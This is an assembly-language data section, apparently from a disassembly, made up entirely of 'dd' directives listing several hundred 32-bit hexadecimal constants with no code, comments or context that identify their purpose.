dd 25A942A8h, 88575C0Ch, 5579BAF4h, 2E547B9Ch, 707CD59Fh
dd 0A9538360h, 0B63C6208h, 24EA90h, 38017CBh, 0DA45EAD0h
dd 62C5470h, 76B82E93h, 0E414B72Bh, 35B38A70h, 66DEDA85h
dd 0A72B780h, 709642E8h, 69C62B9Dh, 8661162Dh, 33BD5D20h
dd 0D64C6215h, 4CF5CDF0h, 0A690641Bh, 4F5F22C3h, 32E70228h
dd 1E446B80h, 7382E078h, 0C4948070h, 5700A1C8h, 3EE40A31h
dd 57A1529Ah, 3E7E5BBAh, 3DF80A1h, 1CBF350Eh, 0E13713F2h
dd 2EAA4BE2h, 0DD0B38D9h, 0BE163ADDh, 27A35BD8h, 0CE9F9F43h
dd 0B3E982A8h, 9E04E7AEh, 0FAD4528Eh, 9E94BAE0h, 0C6915197h
dd 73644A7Ah, 0A6CCF20Ch, 0E7FDF83h, 0C7C5C2E8h, 5F042A50h
dd 7F9A427Ah, 0B5909EAh, 993C6288h, 0B200D2AAh, 6F90314Dh
dd 62749AC0h, 0A8BF708h, 9B3F44A4h, 86ACD26Ch, 0CE3447C5h
dd 77B982E8h, 2B18EFCBh, 668CE5Bh, 643516EDh, 2C4620Bh
dd 0DF753F1Ch, 0F0FC15BAh, 0D6A9A983h, 96B72942h, 0E8A5B73h
dd 158CB2F3h, 3B7FEC1Eh, 369CB70Ch, 6E14AA1Fh, 0FF5482A8h
dd 0AA94BAE0h, 2AE6D99Bh, 3E886B53h, 94EC675Bh, 4EB95A40h
dd 2F8BF814h, 0CCBAAFD9h, 9E9D9278h, 2ED4FC20h, 0C68EB359h
dd 0AC883F83h, 73993298h, 4EB4B5BFh, 62A535F8h, 0EF929A41h
dd 5A21A129h, 6D147A4Dh, 0C3F786C4h, 0BE241F04h, 9BCC35E0h
dd 8E74EFEBh, 295B2B69h, 0AD587013h, 0A31C4F9h, 0C0B36365h
dd 742715DBh, 0E7F7867Ch, 9577562Ah, 1B33F6AFh, 0CC817456h
dd 502920DCh, 0DCD7AB87h, 7E5CFF34h, 33EAC19Ch, 9FB88A3Eh
dd 523119E6h, 0DAC38948h, 0FD9CC4E8h, 6BCFDB20h, 9D7A6257h
dd 9431E3D8h, 0F59B9461h, 76453611h, 0FADC10A1h, 91AD68C0h
dd 4A0622DFh, 0C8B5936Ch, 53B22411h, 0CEC27FAFh, 66AA922Eh
dd 0DED51AFDh, 67652AAh, 556AC736h, 0D4FC80A1h, 8A72531Ah
dd 9E210CC5h, 2E547AA0h, 22A963CDh, 3C248A65h, 0A6814955h
dd 3B7F1A40h, 369CB734h, 4ACF9251h, 8126AC3Ch, 0AEA90A4Dh
dd 0DAA8EB48h, 9C3A5F92h, 0ABA7C099h, 0A3B13D6Dh, 765CF828h
dd 2D02C0D7h, 0BBD17815h, 6EE3E49Dh, 86C1E188h, 0F8A40ABFh
dd 5A62F8D1h, 0DFFBD802h, 0D1A76429h, 8FC9F74Fh, 56AC12E5h
dd 0F4EA3A86h, 632037ABh, 32630AF0h, 0D3506AB4h, 8EB88227h
dd 34EB4268h, 0EBEFAA0Fh, 0C62C27B0h, 452042C8h, 96BF7A6Bh
dd 0BCF34A70h, 0B9576117h, 56695940h, 4E5C4295h, 0D5AF8621h
dd 6D3B8810h, 7111B993h, 0AEFCE257h, 3E648AB7h, 781125C5h
dd 0CA0E4CAFh, 0FD9CFE1Ch, 1E39A6BDh, 4672EAB8h, 4127FA20h
dd 0ECA59478h, 7E6530FCh, 1E814188h, 0D7745AEDh, 76D1D6A5h
dd 0A3757990h, 46A4B26Dh, 2C99C360h, 877C62F2h, 0EB707F43h
dd 0BEBB7258h, 8EB4DAFCh, 0DE49F7DDh, 0E34DAA10h, 6BE2E7Dh
dd 3C06E2A0h, 0D51E916Bh, 0BE31B1EDh, 0E9DCC1D8h, 0EE1C3DDh
dd 0A3E982A8h, 9E04E72Bh, 7D286A8h, 9642BA06h, 56FC2246h
dd 6C54FFC3h, 0E651F2D8h, 93128F56h, 0B6B90C5Dh, 0DCDADC50h
dd 4B8F272Dh, 5C08FAE0h, 0C88DB258h, 0AC983F83h, 8DC43298h
dd 8E46864Dh, 6B614828h, 1E44AAA8h, 86ACCE90h, 35C39160h
dd 68AB5D07h, 220CE12h, 0AAC10198h, 1B41A2Dh, 0F61C4980h
dd 9A3937D0h, 0FECD220h, 0FB203725h, 47A4E2C8h, 664F29FAh
dd 668CB2CCh, 172EE38Bh, 0CB0475Ah, 9E0036CCh, 33A8C7FBh
dd 2E19BA20h, 0D75FA63Bh, 0A6F38AB0h, 0A6CCF215h, 6B2CF05h
dd 0EB75C228h, 1E3622E5h, 3462EAB8h, 3537953h, 167C588Ch
dd 0C028D9F0h, 670C3259h, 4E752AA4h, 0B704D628h, 55446A91h
dd 46819E65h, 5E58BB60h, 867CA2C9h, 0BEFA3EB7h, 2AC10146h
dd 0BB41A2Ah, 0EBD18B28h, 5E933238h, 6A616138h, 59543A8Dh
dd 6F796566h, 0FE248A65h, 0E3198B25h, 0CE3437A5h, 2EF1F178h
dd 1BC42A1Ah, 31B05138h, 0F994BAE1h, 0D6831E88h, 0BBDF9AC3h
dd 0A60CDFF1h, 26F1DFBAh, 909DC228h, 805D450h, 52E1E1B6h
dd 31D4BA0Ah, 924711F0h, 7EA4CBDEh, 381AFC7h, 0B8745AD5h
dd 0BD2BD438h, 0DE766EFDh, 7DEC57F8h, 0EE142CDDh, 0D4391FC8h
dd 6FE4CA25h, 50E80A90h, 0FA4C9973h, 1C1C4268h, 4AFDD0F7h
dd 5387C614h, 2E94AF38h, 7B504F7Dh, 0FF954AB0h, 0DE21FB0h
dd 0EA38A533h, 2EFCC3B8h
dd 9AE82E17h, 1343239h, 9E8CDE1Ch, 0D6FC2720h, 6C3EAFB0h
dd 0CDFFF2E0h, 0CE09AE0Dh, 6AE045E8h, 0BE06F10Ah, 4BED072Dh
dd 0AE2AFAE0h, 163C4360h, 0F573FCF0h, 261E22C5h, 6A8027C0h
dd 2397D934h, 1E843F48h, 8084D6B2h, 1E14A4A0h, 0C3F77513h
dd 0BE242020h, 8BD91897h, 8E74F79Eh, 0EAC4427Eh, 0AD84AAD0h
dd 0D66161E7h, 3543A8Ah, 96BCE2FCh, 0ABA1977Dh, 664C880Ah
dd 0E631A7C5h, 6C438268h, 6C15EAF6h, 0FAA121A7h, 0F194FACAh
dd 0EDF62230h, 0C30E1521h, 66DE30A5h, 6031CA80h, 96AC373Ah
dd 956A4238h, 557A73BBh, 3D51033Fh, 9122FD89h, 3DEF5B3h
dd 261EF0DDh, 0CDD8CDC0h, 69555D53h, 0C44DFE3h, 2B2CD238h
dd 0EED44F8Bh, 0AEA256C9h, 0BEE4DF00h, 13E8E7DBh, 2334DAC0h
dd 0F6DC6A9Dh, 1D953ED0h, 6E9EBB5h, 2E547AA0h, 4B41A808h
dd 0FE248A48h, 0DE668B1h, 4E796133h, 365C42B5h, 7344EA10h
dd 0FB2C5636h, 94B409E6h, 0F6E6C19Bh, 0A2447053h, 873118F1h
dd 0DA14A9A0h, 56411F01h, 124D99Ch, 0A8916E55h, 4B28DBCEh
dd 36425FA9h, 9E84EAD0h, 13DB128Bh, 0A0994725h, 48FDE908h
dd 0FF9E8F6Ch, 635ACCEDh, 0FAEE9F84h, 0A96B471Ch, 26C4E3D4h
dd 0CF9C8279h, 6A4EFB20h, 6D4A748h, 7F784D2Dh, 0E6D8E6CAh
dd 0D4B56E4Fh, 7526FBE4h, 3016A46h, 926D69CEh, 340DC29Fh
dd 0CA7DA243h, 3F28CAF4h, 0DCCD7281h, 976EDAFCh, 0EAF0BAA3h
dd 0B07F7090h, 3F1A1838h, 0E1D8885Dh, 857CFBC8h, 0D8F8D3B1h
dd 9E9F8CADh, 8E39ECBDh, 36A19469h, 0A2593909h, 0FFDAD878h
dd 0A198481Dh, 4D1B220Bh, 0FE658F75h, 5F8C2631h, 17E85A8Fh
dd 769D471Dh, 31C7DEF9h, 0D2AD8EB8h, 98B1BBDDh, 0C65FC664h
dd 6E269EF9h, 0F053BBE3h, 28A3BB52h, 56EF34C0h, 1D95240Dh
dd 88050F13h, 2E0E53A6h, 0ED306BBDh, 0AE66DEFFh, 48D80E9Ch
dd 261C6D2Eh, 0D6FC2248h, 3E648AB0h, 0A6CCF218h, 0E345A80h
dd 769CC2E8h, 0DE042A50h, 466C92B8h, 0AED4FA20h, 163C6288h
dd 7EA4CAF0h, 0E60C3258h, 4E749AC0h, 0B6DC0228h, 1E446A90h
dd 86ACD2F8h, 0EE143A60h, 567CA2C8h, 0BEE40A30h, 264C7298h
dd 8EB4DA00h, 5481C588h, 5E846AE9h, 0EF52B7B7h, 35547A60h
dd 0BD025B3h, 0AD1F429Fh, 368BB80Fh, 0EAD8DEC7h, 0C868447Fh
dd 0A602C509h, 0C8B34687h, 7252E5ECh, 0DF9EB7C1h, 0BBDD8A70h
dd 0A60CBBAEh, 50B35FE7h, 97F5A4C0h, 66042E0Eh, 864AE935h
dd 0AE386220h, 36A46288h, 3A4CAF0h, 262A16D5h, 463D73C0h
dd 0F65BFED4h, 55370C8Ch, 46855075h, 0A767FD60h, 78EF1FC7h
dd 0CE830AF0h, 9D2882DBh, 8ACC5D00h, 5BA53806h, 5E448CECh
dd 32EC1CB7h, 3162A59Dh, 4C49F2F6h, 0D4EB8204h, 928C7C57h
dd 0B9C2593Ch, 268AF1A7h, 0D5AF2178h, 21766DFBh, 0AE9D6465h
dd 11FBEA48h, 0BBDFCD7Ch, 0A60CBB86h, 27AEDFBBh, 769CC228h
dd 0D25C2A50h, 0C16C92B8h, 6EDD889Dh, 65B1FA88h, 96BCA983h
dd 690C3258h, 8E3D2875h, 0AE110228h, 0E4E719h, 0AD3D238h
dd 0C78EC713h, 0CDBBA208h, 0FECD7CADh, 9CC1EB98h, 0F6B41A39h
dd 0F61C4267h, 0E9C3F3DFh, 0C6EC92A7h, 532C4CA0h, 99B7916Ah
dd 0BE0DF4DDh, 0E9BEB5D8h, 0D5F426B6h, 365D8924h, 0AE2A6D10h
dd 6BB05178h, 0F994BAE0h, 0AECC1E86h, 350FE8F8h, 8F727717h
dd 4C335A40h, 0F6A43C38h, 0F7F82A29h, 0B256DB38h, 0BFABBA1Fh
dd 973D9AFFh, 0D5EF8991h, 2265B3FBh, 9B746604h, 0EEC3CB3Ch
dd 252A030Fh, 86AC696Bh, 695A060h, 4DAA95AAh, 0BEE4B5ADh
dd 10CBA898h, 19B90F00h, 0F843529Eh, 0F83B457h, 0ACFA6AE9h
dd 7B53F9D3h, 96FCCB9Eh, 0F664CFD5h, 0E210B19Fh, 0A5F41A40h
dd 0F6551C15h, 6B9C1A10h, 94721FAh, 0AE9D645Dh, 7081A148h
dd 41644A89h, 29FBD614h, 49035CC0h, 19A478DBh, 0BE3DAA3Eh
dd 6250D367h, 8AC0231Ch, 0C1605EA1h, 0FFBDB530h, 513F311Fh
dd 0CF3E4E95h, 4C219A4Fh, 9F767EC7h, 2783FB7Fh, 6F2EAE13h
dd 0E39AF8AFh, 3FC6DE94h, 0EE35E5DFh, 0F9E0E6Fh, 1E45AF0Fh
dd 0DF963E9Fh, 0E3C7D83Fh, 0AF4E6EC1h, 0B3F7D26Fh, 75269E11h
dd 0A6A52445h, 1F8DF540h, 0DC17F1CBh, 0C7D8AC8Fh, 6D47200Bh
dd 6A6ABD9Fh, 0A4113A90h, 0CBDCE9C3h, 0A60CD649h, 605D25Ah
dd 12DCA4E6h, 0FC622C4Fh, 8E6E6C0Fh, 0C5A97448h, 0EFAE5EBh
dd 7B3A7B6Bh, 93794A80h, 28F4D9B3h, 6E3F527h, 6FC96C40h
dd 20AC12D4h, 16EA6107h, 20FCFC10h, 6EECDF2Fh, 53190A89h
dd 8FFC9973h, 721C4268h, 2F813E7Eh, 0A1B26058h, 8659E5CAh
dd 16BCE208h, 418F2CD7h, 52A8FF4Dh, 4B871A80h, 369CB699h
dd 1EC4EA10h, 0E67C5584h, 3F19B146h, 0D9FCE274h, 45658AB0h
dd 0A6CC8894h, 99E9D280h, 0D1039A7Ch, 0D79687D9h, 1EBC9278h
dd 2BA7A586h, 167C56B9h, 7FA4CAF0h, 0CF827FD1h, 99889A00h
dd 82CD8753h, 1E446A50h, 6504D4F8h, 0FB26397Ch, 0B25F0AC5h
dd 1C3B38B7h, 0C44C7220h, 1EB30EA7h, 734FDCADh, 5E447EE1h
dd 0BEEC1238h, 36B10718h, 0E5CE1708h, 0BE185BEDh, 668CB2D8h
dd 8B73923Ch, 339082A0h, 0D6A16DA8h, 75F7ED78h, 0AEA8EB5Dh
dd 0D6FC2548h, 0EE685EB0h, 21734C71h, 0CEFDF0FDh, 51E73DE8h
dd 92BCB318h, 723D17C3h, 0AED3FAE0h, 0BDB06288h, 0F5483148h
dd 6CA9AB62h, 0F9745AF9h, 55DC0290h, 0A7ECD56Ch, 21ACD2D2h
dd 855EF708h, 2E9C12ABh, 0B58F6673h, 8EAE3BF7h, 3956EF73h
dd 63A3DDF9h, 5E447EE1h, 887F4443h, 2E547A9Fh, 5A4F6F5h
dd 0AE4F2902h, 0A35CABBh, 66165933h, 917E97CBh, 0E53B5581h
dd 2FA6D7EFh, 36ABBA20h, 0A578DAC1h, 7E589B2Dh, 0A6CCF618h
dd 0A6228E80h, 2ED682C1h, 9EFC82F7h, 0EED39644h, 4DAB72CDh
dd 27C1191Fh, 86A40ABCh, 130C3258h, 75C11A06h, 0B6DCC214h
dd 7ECAB5Ch, 80F5EBE0h, 2E2865BDh, 59E0E2C8h, 0EABBAF36h
dd 96F37258h, 0B2A44B1h, 0F6DC763Bh, 6844FA76h, 6C02DB5h
dd 86B624A0h, 13AF8F66h, 0FEE45E41h, 668CB2C8h, 174421ACh
dd 0C3D468FEh, 0E5B1064h, 46FBEC10h, 0F0214347h, 0A5FCE271h
dd 7E589B2Dh, 0A6CCD218h, 9E2D8F80h, 4F21BC30h, 4804EA5Ch
dd 6ED1A52h, 7AE57F4Bh, 167C6248h, 8158CAF0h, 0E03476D8h
dd 8E48835Dh, 2F43E828h, 0DE6DF025h, 3BF6DF8h, 0EED46E51h
dd 967CA2C8h, 0E5413BDh, 1275F796h, 0DD0ADAC0h, 361073E5h
dd 5E842AD0h, 76F3E738h, 18D98418h, 30BC2234h, 0B6C66717h
dd 0E3DF9AE9h, 0CE340E71h, 365C83A8h, 8774ECDCh, 3212F76Eh
dd 0AD4BA20h, 0F0A11C47h, 9C644A7Ch, 276418AFh, 1FB911F0h
dd 769C02D4h, 0B042A4Eh, 403426B6h, 6EE8247Dh, 8FE38888h
dd 3E8D6C45h, 0C2287A58h, 1DCB9AC0h, 76D033A5h, 1E447290h
dd 0F55826F8h, 2E286BDDh, 5680A2C8h, 6EDBDF30h, 1D16C20h
dd 38B41A2Ch, 734F7FFFh, 5E447EE1h, 0C6EC0A38h, 86B68B4Dh
dd 33C28287h, 0FEE45E57h, 269B0D32h, 2CE945E6h, 30749B10h
dd 5EF8D5ADh, 9501278h, 3AAB5FE6h, 71DE2288h, 6A550FBBh
dd 0B6CCF2D8h, 0A6D65A80h, 79508269h, 0E8FC6ED0h, 8640AD15h
dd 0B56BE020h, 2267E732h, 0EDFBCA30h, 262003D5h, 4E749AC0h
dd 6E5F6E8h, 7C96C40h, 20AC12C4h, 0BA25BF0Bh, 767CA208h
dd 3C540A30h, 22507465h, 18BE2985h, 36105BC5h, 0E80133D0h
dd 24ECD201h, 2B20FA07h, 966CE9F5h, 0BE4F99F0h, 5711C96Eh
dd 0CEF4DA6Ch, 0D45C8268h
dd 4BF510A8h, 0E415E676h, 787C6A47h, 1630FDC5h, 4104CAB0h
dd 0D55442AEh, 0CE084BFDh, 761CC2E8h, 4E02BF50h, 5FD10C32h
dd 4CD4BA0Ch, 1338E21Fh, 7E14D1FDh, 2667F1D8h, 5FF9D166h
dd 0B6DCC214h, 0CB446B90h, 806C62EFh, 2E2863DDh, 4DE3FCC8h
dd 7E63A2CAh, 1275D78Eh, 3956DAC0h, 858243D8h, 9EB87B4Dh
dd 0C8EC1238h, 3D6F6FA0h, 56F0D385h, 0FA244A70h, 0D68247D8h
dd 0F9792400h, 0B05C4294h, 5EF8BAADh, 164C1378h, 0EF7672FAh
dd 0B1FC92DFh, 48A41AB8h, 66E0CD95h, 8B47C480h, 765CF6D9h
dd 0DEFC2A50h, 0EE8E8245h, 0BCA629Fh, 167C569Eh, 7F14750Ah
dd 1E9C2A2Fh, 5A4A1FC6h, 0C54202E8h, 0DE783B0Dh, 96ACD2F8h
dd 0FBE9EB60h, 0D93448E5h, 0E8491448h, 0C44CB2A4h, 38F4CDA7h
dd 0BFA2EF41h, 0DBF7AA10h, 0C62C2609h, 2E747AA0h, 656DF1F5h
dd 0B6C64517h, 0C3929AD1h, 0CE340E66h, 305BE6E8h, 5EF8D4ADh
dd 1F93B878h, 0AE9D4455h, 503D9C48h, 7E4D140Dh, 16731818h
dd 37B95C58h, 0D09C02D4h, 0CA35AF1Bh, 466B9278h, 2ACFFB20h
dd 163C6203h, 9483148h, 0D799AD72h, 0CF745AECh, 0B6DC0259h
dd 1E05018Eh, 73ABD2F8h, 0AF7F25Dh, 0DE238043h, 0BEE40A30h
dd 24A1CD72h, 0EB2B52DAh, 1294DD82h, 0C986392Bh, 610E5207h
dd 0FA65FFCBh, 96BCE2C8h, 0BED94B70h, 529D37A3h, 0CEF41A80h
dd 14907AA8h, 424142EAh, 32FDD703h, 6E94BA20h, 43072448h
dd 9C0594F1h, 539576AFh, 2A7C8088h, 110328E4h, 48FC7A3Fh
dd 0EE8E90CFh, 2BD2D7F8h, 167C569Fh, 81BB750Ah, 95B26BE8h
dd 8E488B3Dh, 0B6DC0228h, 8E647E10h, 9F31ECF3h, 0AF147A4Ch
dd 0CF89ACA8h, 0C0E42E38h, 0E6604B35h, 91D89A00h, 512006E8h
dd 7C1A4B60h, 0C08C6180h, 0EE68A3FDh, 0E5630808h, 0BE185BEDh
dd 668C92D8h, 9D23CE40h, 0F650B325h, 9EC4EA10h, 7539A658h
dd 6E94BD9Bh, 6601D648h, 31FB3420h, 1B53B98Fh, 0EF453FEh
dd 0B72583BFh, 0E8CC7A24h, 8640AB35h, 2BA7A420h, 167C56B9h
dd 7E64CAF0h, 4EEE2EA4h, 0CB6ADD10h, 0B61C3601h, 96A674F7h
dd 23B2B27Bh, 0EED46E49h, 0D3EFFD22h, 0BE241E01h, 274C7297h
dd 0BC70DECh, 0F6DC7659h, 3E84AAD0h, 857F0FC4h, 2E547A9Fh
dd 66CE7F4h, 895335D6h, 0F0112D8Bh, 0F9F4DA79h, 3AA4FBE0h
dd 1BB7B31Fh, 6EC6649h, 6E14BAE0h, 538920B5h, 3EA49E99h
dd 260CEA8Eh, 66C35DF9h, 0B2E9C65Dh, 9F041A6Ch, 0C1BC8AD8h
dd 4CD65D87h, 0F4FC5330h, 50C3057h, 0E6A4CAD8h, 2F729AC0h
dd 11349DC2h, 1CB9330Dh, 0C67D5A12h, 0B1A4E57Ah, 5A011F5Eh
dd 0ADE4CAFCh, 0E6604315h, 8EB4DA00h, 251EB778h, 94CC2F7h
dd 0DE1B8D21h, 5E6BF287h, 9F5A5F7Fh, 8B254AB0h, 664C7B56h
dd 0A6B1341h, 7BE58684h, 9E04DAF5h, 2FAEDFEFh, 0EBABBA20h
dd 0D6BC0BC6h, 6A550FBBh, 0A60CF2D8h, 10C85A80h, 38038A93h
dd 2DD62A4Ch, 6FD61F37h, 0B5D4FAE0h, 163D2B04h, 7EA1B2F0h
dd 23D33258h, 92B9680Eh, 72C63417h, 5544B654h, 46814A65h
dd 4499C360h, 897C62F1h, 0C1D0C2B7h, 0FE9B01C0h, 0F6881D87h
dd 7D57380Ch, 57261F57h, 0C92312F8h, 0ABCD865Eh, 96FCCB46h
dd 871C8C6Fh, 0A6A5F855h, 0F603A540h, 36DC35CBh, 0EB9CEA10h
dd 81472102h, 0AE9D6055h, 8F64F848h, 0C90FE9BAh, 66E55885h
dd 16EAE580h, 51A8FCE7h, 0DB5DAD12h, 478C0AABh, 2ACFFA20h
dd 163C634Eh, 0B7FA5FEFh, 530B3298h, 4EB4932Eh, 0AD842E7Ch
dd 1E44CC0Dh, 826E4FF8h, 0C7E2BF47h, 547BA208h, 0AC6672E0h
dd 8BCB01DBh, 8E74D39Ah, 0C123B768h, 0E17FB60Bh, 0C6EC131Fh
dd 9B5D86C7h, 96FCCBA2h, 0FF21CF73h, 0E38BB2D8h, 0CE3413AEh
dd 3D540342h, 0D249F92Dh, 812C5278h, 0B1ABBC20h, 0F64F274h
dd 770FE9BAh, 66E5589Dh, 6AB96980h, 799CC2E8h, 1E2D94CDh
dd 0B8F195B8h, 39D4BA19h, 0A7F3D88h, 7EE14CF3h, 25233258h
dd 0AF3A9C8h, 39DC0228h, 0DD436CD0h, 7831D5E4h, 20147A59h
dd 0DC31D118h, 0B5E4CA09h, 0E661AA05h, 0CE393400h, 0F68FC75Bh
dd 0F2DDAAD0h, 0EAEC1238h, 9AD989D3h, 16BCE208h, 7B1F3F42h
dd 668CB24Fh, 0F9F5E0C7h, 4EACB667h, 0D5AF7F48h, 2F8EDF41h
dd 7D69BA20h, 0DFA2A747h, 0BB638A70h, 0A60CBBE6h, 276ADF09h
dd 7623C228h, 0D742AF67h, 3E7A9278h, 87967F17h, 0EFAA6248h
dd 7EA4CAC5h, 7E1FC4A8h, 4E749AD3h, 3198C09Dh, 214255D1h
dd 383C236h, 0EED47326h, 12FB9E35h, 45D56920h, 0C7485654h
dd 15F3F567h, 3615D4E5h, 0CBFB4AD0h, 0C62C1BC6h, 452670C8h
dd 9665036Bh, 0EBA44A70h, 5A4F8DCAh, 0DBB23AEh, 0FADA81A0h
dd 67AF8963h, 6C7AD76Bh, 420BB993h, 0E79FA364h, 35648A8Ch
dd 0C127815Bh, 2AEADBB4h, 169CC208h, 6944FD92h, 0C3EFB6ACh
dd 0AE143382h, 3271CBFDh, 0FBA3CAF0h, 0E6CCFBA6h, 94D9FF1Ah
dd 78DB48FFh, 2282557Ch, 0DEC318B2h, 0EEC2BB1Bh, 5681A2C8h
dd 0FC5D0A30h, 6986A1DCh, 0A66E4F85h, 7DEE42A8h, 9EB9463Dh
dd 0AD849538h, 2EDBFEA3h, 1345E208h, 0FEE4639Eh, 0D3EB22Eh
dd 0EC98ECDh, 2D1C07A8h, 9EC44E8Ch, 0D66C6D78h, 9E932430h
dd 0D6E4239Eh, 8C248AB0h, 9308675Bh, 66B35A40h, 3C20C18Bh
dd 67042A4Dh, 86454835h, 68518720h, 8B3CA2B1h, 3E8D2C5Dh
dd 0BAE358h, 0BBFF6AC0h, 0B61C37A4h, 252F020Fh, 86B1CE74h
dd 8514A460h, 96B57875h, 3E796930h, 0A94CB2A5h, 0AAF9978h
dd 0F61C4615h, 575A2F59h, 7FBB12F8h, 0DE85BD9Fh, 47C0FCD9h
dd 37F6DF03h, 0F3E7B218h, 0CE340FA0h, 0B267C225h, 9EC4EE41h
dd 83B50B47h, 6E54F302h, 2ECDF399h, 3E5F8AA3h, 64181C8h
dd 8B349AADh, 0F020C1A8h, 67042A4Ch, 86456435h, 0F35C3D20h
dd 913C6261h, 0FBD7E237h, 0E6CC0669h, 3E749AC0h, 33DB08D5h
dd 1E845A75h, 0C7AB84C7h, 8F672B0Bh, 5F722741h, 0F94C0AF0h
dd 0A14C72B4h, 0BB3D6C7h, 0F6DC527Dh, 1F83DCDFh, 0A77F6343h
dd 7A6FF29h, 8D7BE2C8h, 772695BBh, 0B91987B7h, 11472958h
dd 0EF2C85B4h, 0A1DCABF7h, 0CD02D328h, 76E230Bh, 207B2FB4h
dd 1E928BB4h, 21E82D8Fh, 0D0336E3Eh, 0AE603FF8h, 0C14D4123h
dd 0A0F19DF9h, 0F1D4BA19h, 660B6FFh, 1F8ABFh, 0E60C32E0h
dd 392F257Fh, 6C597F1Fh, 5244AAA8h, 0BF7B816Fh, 0F576C4h
dd 0A5728EC2h, 68C4362Eh, 3AA09E9Ch, 0C348C834h, 8ED1424Ch
dd 5FFBF3AFh, 324D7FDh, 34B6EA0h, 960A25D7h, 7513CF73h
dd 6913C19Bh, 142DF175h, 14E08167h, 93AF8963h, 0BCE195A3h
dd 57B3EE3h, 539512Bh, 45529D6Fh, 0CDA7E294h, 0C1E457F3h
dd 0F2A70134h, 956F494Dh, 5B14BD87h, 0B59F7952h, 5D360A04h
dd 0E6F2DD83h, 0E60C3242h, 25FF49A8h, 0B6DC5A4Bh, 9F916A90h
dd 46974C8Dh, 0F1212360h, 1D60A2C8h, 305995FEh, 0C24CB2A1h
dd 0F56BC89h, 0EDF27F4Ah, 5E83904Dh, 0EA268D38h, 0AFB6D89Fh
dd 8D01322Fh, 0FE2340EDh, 744BC9D8h, 0CEF4FA40h, 3965079Bh
dd 61B6EA10h, 0BCB3549Ch, 218C9C0h, 0B9FC2246h, 3F0D0BB4h
dd 9DCCF219h, 0E3208FAh, 0FCE99AE8h, 60FF4923h, 466C94D7h
dd 0B1C4C4A7h, 16F45E3Eh, 4FA4CBF0h, 8D725030h, 75E98AB3h
dd 7DCC214h, 0EF93AB0h, 60AC12C4h, 264D3840h, 2E4B630h
dd 3B8F6956h, 68C071C6h, 0FB857C4Fh, 0F6DC7659h, 5C5CCFB7h
dd 0FEC1238h, 2E548048h, 22A42A08h, 884F2916h, 0A6A08B55h
dd 0F878A040h, 369CB681h
dd 8ADD6F98h, 664A52B8h, 3AA53F8Bh, 0D6042288h, 47998AB0h
dd 92F33F98h, 0DA355A40h, 4721B9A5h, 0E104EA5Ch, 0B26D92B8h
dd 97617A37h, 133CA2B4h, 33245AFCh, 0E6CC066Eh, 0CED74EBDh
dd 76D01D8Dh, 0B4B86F90h, 0B27D5783h, 0EE143AA0h, 4F7022C8h
dd 0EABDA7B0h, 0D54A7258h, 34195D89h, 0F61C8251h, 15F839B8h
dd 0ABAC6A3Bh, 0B2CF9D3h, 11BCE206h, 0BE0DA0E5h, 0AC6CAD8h
dd 4AEF5933h, 365C849Fh, 97323F97h, 0CCB352B8h, 16BEBDD4h
dd 9D774F0Bh, 3F190CB3h, 604DF218h, 0E347A9Ch, 0A8D63D88h
dd 0EAEA2D7Ah, 355C5CB7h, 6EE82B9Dh, 163C6288h, 39E1FE0h
dd 2620FEE5h, 0B3F125C0h, 0C9DCC238h, 25EDA12Ch, 0FBACD2F1h
dd 2E043ACDh, 0E721D5C8h, 0B1E26D30h, 17D10934h, 8EB41A2Ch
dd 0ED2C4268h, 5E84124Ch, 0DEFB6138h, 452569C8h, 34515D6Bh
dd 7B248A49h, 0F810B186h, 59F41A40h, 0F6557415h, 0AEFA7510h
dd 0E6108CF9h, 59F4BAE0h, 0D8EB1A7Eh, 0B063D37Fh, 3B59BD04h
dd 99349A90h, 0B6AC1F5Dh, 69D6BC50h, 0E3EBB67Ch, 0AE140AC5h
dd 0EBDFE588h, 7EA4CAF0h, 0E714BCCFh, 1D73A206h, 336379A3h
dd 1E84430Ah, 0B27D5783h, 0EED43AA0h, 5870A2C8h, 30E3023Bh
dd 9F5C4B8Ch, 4E7D48ADh, 0CECBBD68h, 0DBF77AD1h, 0C62C2609h
dd 2E547A60h, 7EAFE4F4h, 729832A1h, 145C19Bh, 0F6031D44h
dd 0E768747Fh, 75687DBAh, 2A81CFA1h, 194FACCh, 0CDD6F1E4h
dd 0BDE1FC81h, 0A6CCF346h, 1A0FEFB6h, 7451C228h, 2CEC5CB9h
dd 96F48484h, 0E5906253h, 919211EBh, 48A3D636h, 0D7914948h
dd 4E745AECh, 2BEC0228h, 31B97051h, 0AF164F71h, 6B133AA0h
dd 563CB21Dh, 0BE01B1AFh, 14C7298h, 1BBFC2BFh, 0F6DC6B8Ah
dd 5E523159h, 4771238h, 0FFD9F180h, 96BC2234h, 0EAA44A70h
dd 45F464D3h, 87F5939h, 0FFC6FF1Fh, 0A1A3EAD0h, 81148DF1h
dd 0EB0BCA26h, 0D6BC0BB2h, 0B15C5489h, 9E126B17h, 91249C81h
dd 0F19C0A07h, 1E2DC4CDh, 62486AB8h, 70D5FA20h, 0D93DAB80h
dd 0A5395420h, 950CF264h, 8E488B3Dh, 0B6DC0228h, 21467E80h
dd 469C2F6Dh, 7D14F060h, 96B09345h, 0C0E40A30h, 4C408798h
dd 9F39913Ah, 0F61C8254h, 8B84AED0h, 0F6418C32h, 3D543A8Ch
dd 56F0D385h, 0FEE44A70h, 0E09347D8h, 78B21C3Bh, 45FAD8A6h
dd 9D3AF377h, 8921446h, 41E79CAAh, 0F883C616h, 9662194Ch
dd 8FFE3F97h, 15345A40h, 0FDD33A64h, 10B94923h, 2D6C5281h
dd 6EE93EADh, 0ECF11188h, 0F5A40AC9h, 2621FEC5h, 88F127C0h
dd 2BDCC211h, 0DE6D8CFDh, 605A03F8h, 1CA93960h, 1D7C62F1h
dd 0FED9A29Dh, 0F4E10198h, 0E5B41A39h, 36116EF5h, 0A43937D0h
dd 0ADECD200h, 0EE5D4C0Dh, 3B73808h, 0FEE45FBCh, 4F3E1757h
dd 91F41A80h, 365C82C0h, 9F1A2710h, 39F52FF9h, 0FE3CBA20h
dd 5681633Bh, 0BB644A9Dh, 0DE4BB558h, 4F2F0AF3h, 0B6B14265h
dd 0EE316D50h, 0B36CACB8h, 4255E034h, 0E7A85EA4h, 0E644BDFDh
dd 8D674114h, 0A40C9F2Dh, 0CE97714Fh, 552F09BEh, 9BC7F019h
dd 0E0289098h, 567C8770h, 5B7CEA30h, 0D32701DBh, 0AA786539h
dd 2C91BF58h, 0E9846AE8h, 470E0AE8h, 0C1528096h, 96243825h
dd 89242970h, 0B88C4C94h, 0A6695990h, 0B95C4295h, 9445F24Ch
